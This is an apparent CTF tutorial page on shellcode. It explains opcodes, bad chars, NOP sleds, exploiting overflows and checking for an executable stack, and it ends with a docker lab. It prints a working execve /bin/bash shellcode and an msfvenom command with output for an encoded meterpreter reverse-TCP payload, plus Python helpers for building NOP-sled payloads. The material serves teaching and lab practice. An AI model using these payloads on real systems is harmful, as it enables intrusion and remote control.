# Shellcode

A shellcode is a string of bytes that represents an executable piece of machine code.

Here is a shellcode example that performs an `execve` call on `/bin/bash -p` ([taken from exploit-db](https://www.exploit-db.com/shellcodes/13697)):

```python
# 33-byte execve("/bin/bash", ["/bin/bash", "-p"], NULL) shellcode, as a Python 3 bytes literal
shellcode = b"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"
```

## Opcode to string

In assembly language, opcodes are typically represented by mnemonic codes, such as "ADD" or "MOV", that are easier for humans to understand. These codes are then translated into machine code, which consists of a series of binary digits (0s and 1s) that the CPU can execute.

For example, on [x86 architecture computers](/pwn/architectures/x86-x64.md), the opcode `0x6A` (in binary `01101010`) corresponds to the `push` instruction (add a value to the top of the stack). Therefore, the instruction `0x6A 0x14` (`01101010 00010100`) corresponds to `push 0x14` (add the hexadecimal value `0x14`, or `20` in decimal, to the top of the stack).

It is therefore possible to build a string that chains many of these opcodes (such as the shellcode shown in the introduction); if the instruction pointer is made to point at these opcodes, they are executed like any compiled program.

## Bad chars

When creating shellcodes, some characters may be forbidden for various reasons. For example, a null byte may terminate the string, or the program may filter out certain bytes. These characters are called "**bad chars**" or "**invalid chars**".

Here are the 4 most common bad chars:

* 00 -> NULL
* 0A -> new line -> `\n`
* 0D -> carriage return -> `\r`
* FF -> page break -> `\f`

## NOPcode

NOP (no operation) instructions do exactly what they sound like: *nothing*. This makes them very useful for shellcode exploits, because all they do is fall through to the next instruction.

If the shellcode is padded on the left with NOPs and EIP points somewhere in the middle of them, the CPU simply executes NOPs until it reaches the real shellcode. This gives a greater margin of error: a shift of a few bytes forward or backward won't affect the payload.

This padding with NOPs is often called a NOP slide or NOP sled, since the EIP is essentially sliding down them.

## Generate shellcode

Many shellcodes can be found on the internet. Another way is to generate one with a tool such as msfvenom:

```bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -f c -e x86/countdown

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/countdown
x86/countdown succeeded with size 139 (iteration=0)
x86/countdown chosen with final size 139
Payload size: 139 bytes
Final size of c file: 610 bytes
unsigned char buf[] = 
"\x6a\x7a\x59\xe8\xff\xff\xff\xff\xc1\x5e\x30\x4c\x0e\x07\xe2"
"\xfa\x6b\x08\x5d\x35\xde\xf1\xe4\x5b\x4a\x59\x61\x0e\xbd\x68"
"\x86\xf1\xdc\x92\x84\x4f\x7d\x69\x17\x18\x18\x72\x19\x1c\x18"
"\x27\x96\xc1\x4b\x44\x7b\x74\x74\x71\xae\xc9\x6a\xe7\xab\xa9"
"\xed\x57\x36\x7e\x45\x0f\x5b\x96\x35\x36\x37\x60\x53\x3a\x51"
"\x39\xb4\xdd\x0e\x89\x8c\xc2\xc6\x84\x3c\xfb\xac\x6f\xfb\x4d"
"\xf2\x4c\x5d\x4e\x4f\xd9\xb2\x93\xb8\x58\x94\xb5\x5b\xe8\x24"
"\x97\xdb\xd9\x9d\x26\x4f\x3b\xe8\x83\xfa\xd6\x0f\xd6\x64\xa5"
"\xe9\xef\xab\x14\x6f\x91\x8e\xc8\x70\x72\x73\x74\xce\x77\x77"
"\x78\x79\xb7\xfb";
```

{% hint style="info" %}
The x86/countdown encoder removes the most common bad chars.
{% endhint %}

In Intel x86 assembly, the NOP instruction is encoded as `\x90`.
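As an added example (not code from this page, exploit-db or msfvenom), the following Python helper ties the "Bad chars", "NOPcode" and "Generate shellcode" sections together: it rebuilds raw bytes from an msfvenom `-f c` listing, scans a shellcode for the four bad chars listed above, and pads it into a NOP sled. Both inputs are copied from the listings on this page; run on the encoded msfvenom output, the scan reports the four `\xff` bytes at offsets 4 to 7, which is why the check belongs in the workflow rather than trusting the encoder.

```python
import re

# Constructed inputs: both byte strings are copied from the listings on this page.
EXECVE_SC = (b"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68"
             b"\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89"
             b"\xe1\xcd\x80")
MSF_C_LISTING = r'''unsigned char buf[] =
"\x6a\x7a\x59\xe8\xff\xff\xff\xff\xc1\x5e\x30\x4c\x0e\x07\xe2"
"\xfa\x6b\x08\x5d\x35\xde\xf1\xe4\x5b\x4a\x59\x61\x0e\xbd\x68"
"\x86\xf1\xdc\x92\x84\x4f\x7d\x69\x17\x18\x18\x72\x19\x1c\x18"
"\x27\x96\xc1\x4b\x44\x7b\x74\x74\x71\xae\xc9\x6a\xe7\xab\xa9"
"\xed\x57\x36\x7e\x45\x0f\x5b\x96\x35\x36\x37\x60\x53\x3a\x51"
"\x39\xb4\xdd\x0e\x89\x8c\xc2\xc6\x84\x3c\xfb\xac\x6f\xfb\x4d"
"\xf2\x4c\x5d\x4e\x4f\xd9\xb2\x93\xb8\x58\x94\xb5\x5b\xe8\x24"
"\x97\xdb\xd9\x9d\x26\x4f\x3b\xe8\x83\xfa\xd6\x0f\xd6\x64\xa5"
"\xe9\xef\xab\x14\x6f\x91\x8e\xc8\x70\x72\x73\x74\xce\x77\x77"
"\x78\x79\xb7\xfb";'''

BAD_CHARS = b"\x00\x0a\x0d\xff"   # the four bad chars listed on this page
NOP = b"\x90"                      # x86 single-byte NOP

def parse_c_listing(text: str) -> bytes:
    """Rebuild raw bytes from an msfvenom '-f c' listing (any \\xNN C string)."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))

def find_bad_chars(shellcode: bytes, bad: bytes = BAD_CHARS) -> list:
    """(offset, value) of every byte the target would truncate or mangle."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]

def nop_sled(shellcode: bytes, total: int, bad: bytes = BAD_CHARS) -> bytes:
    """Left-pad shellcode with NOPs up to `total` bytes; refuse a payload that
    still carries a bad char, since an encoder is not a guarantee."""
    if len(shellcode) > total:
        raise ValueError("shellcode does not fit in the buffer")
    hits = find_bad_chars(shellcode, bad)
    if hits:
        raise ValueError("bad chars at offsets %s" % [i for i, _ in hits])
    return NOP * (total - len(shellcode)) + shellcode

def lands_in_sled(payload: bytes, shellcode: bytes, offset: int) -> bool:
    """True when a jump to `offset` only crosses NOPs before reaching the code,
    i.e. the offset lies anywhere inside the sled."""
    start = len(payload) - len(shellcode)
    return 0 <= offset <= start and set(payload[offset:start]) <= {NOP[0]}
```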

## Exploitation

To achieve arbitrary code execution, the shellcode is sent through user input and the instruction pointer must be overwritten so that it jumps into the shellcode instead of the next intended instruction.

To overwrite the instruction pointer, techniques such as [buffer overflow](/pwn/stack-exploitation/stack-buffer-overflow.md) or [format string exploitation](/pwn/stack-exploitation/format-string.md) can be used.

{% hint style="warning" %}
The stack must be executable in order to run a shellcode stored on it.

Here is a command to check the stack flags:

```
$ readelf -l chall | grep GNU_STACK

Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4
```

{% endhint %}
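As an added example (not code from the page), a Python parser that reads the same `GNU_STACK` program header readelf prints above directly from the ELF file, for both ELF32 and ELF64 images; the `make_elf32` helper is a constructed, non-runnable 32-bit image carrying the `RWE` flags from the readelf output, so the check can be exercised offline.

```python
import struct

PT_GNU_STACK = 0x6474E551          # program header type readelf prints as GNU_STACK
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4   # p_flags bits behind readelf's "Flg" column (RWE)

def stack_flags(elf: bytes):
    """Return p_flags of the PT_GNU_STACK entry of a little-endian ELF image,
    or None when the binary has no such entry."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = elf[4] == 2                      # EI_CLASS: 1 = ELF32, 2 = ELF64
    if is64:
        (e_phoff,) = struct.unpack_from("<Q", elf, 32)
        e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 54)
    else:
        (e_phoff,) = struct.unpack_from("<I", elf, 28)
        e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type = struct.unpack_from("<I", elf, off)[0]
        # p_flags follows p_type in Elf64_Phdr but sits at +24 in Elf32_Phdr
        p_flags = struct.unpack_from("<I", elf, off + (4 if is64 else 24))[0]
        if p_type == PT_GNU_STACK:
            return p_flags
    return None

def stack_is_executable(elf: bytes):
    """True/False from the GNU_STACK E bit; None when the entry is absent, in
    which case the loader's default decides and readelf prints no such line."""
    flags = stack_flags(elf)
    return None if flags is None else bool(flags & PF_X)

def make_elf32(stack_pflags: int) -> bytes:
    """Constructed minimal ELF32 image (header + one PT_GNU_STACK entry) for
    testing; only the fields stack_flags() reads are meaningful."""
    ident = b"\x7fELF\x01\x01\x01" + b"\x00" * 9      # ELF32, little-endian, v1
    ehdr = struct.pack("<16sHHIIIIIHHHHHH", ident,
                       2, 3, 1,             # ET_EXEC, EM_386, EV_CURRENT
                       0, 52, 0, 0,         # e_entry, e_phoff, e_shoff, e_flags
                       52, 32, 1, 0, 0, 0)  # ehsize, phentsize, phnum, no sections
    # Elf32_Phdr: type, offset, vaddr, paddr, filesz, memsz, flags, align
    phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_pflags, 4)
    return ehdr + phdr

if __name__ == "__main__":
    for name, img in (("RWE", make_elf32(PF_R | PF_W | PF_X)), ("RW", make_elf32(PF_R | PF_W))):
        print(name, "executable stack:", stack_is_executable(img))
```

On a real target, `stack_is_executable(open("chall", "rb").read())` gives the same answer as the `grep GNU_STACK` line above without needing binutils installed.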

## Exercise

If you want to try this exploit by yourself, you can pull [this docker image](https://hub.docker.com/r/thectfrecipes/pwn/general):

```
docker pull thectfrecipes/pwn:data_edit
```

Deploy the image using the following command:

```
docker run --name format_string_data_edit -it --rm -d -p 3000:3000 thectfrecipes/pwn:data_edit
```

Access the web shell with your browser at the address `http://localhost:3000/`:

```
login: challenge
password: password
```

## Resources

{% embed url="https://ir0nstone.gitbook.io/notes/types/stack/shellcode" %}
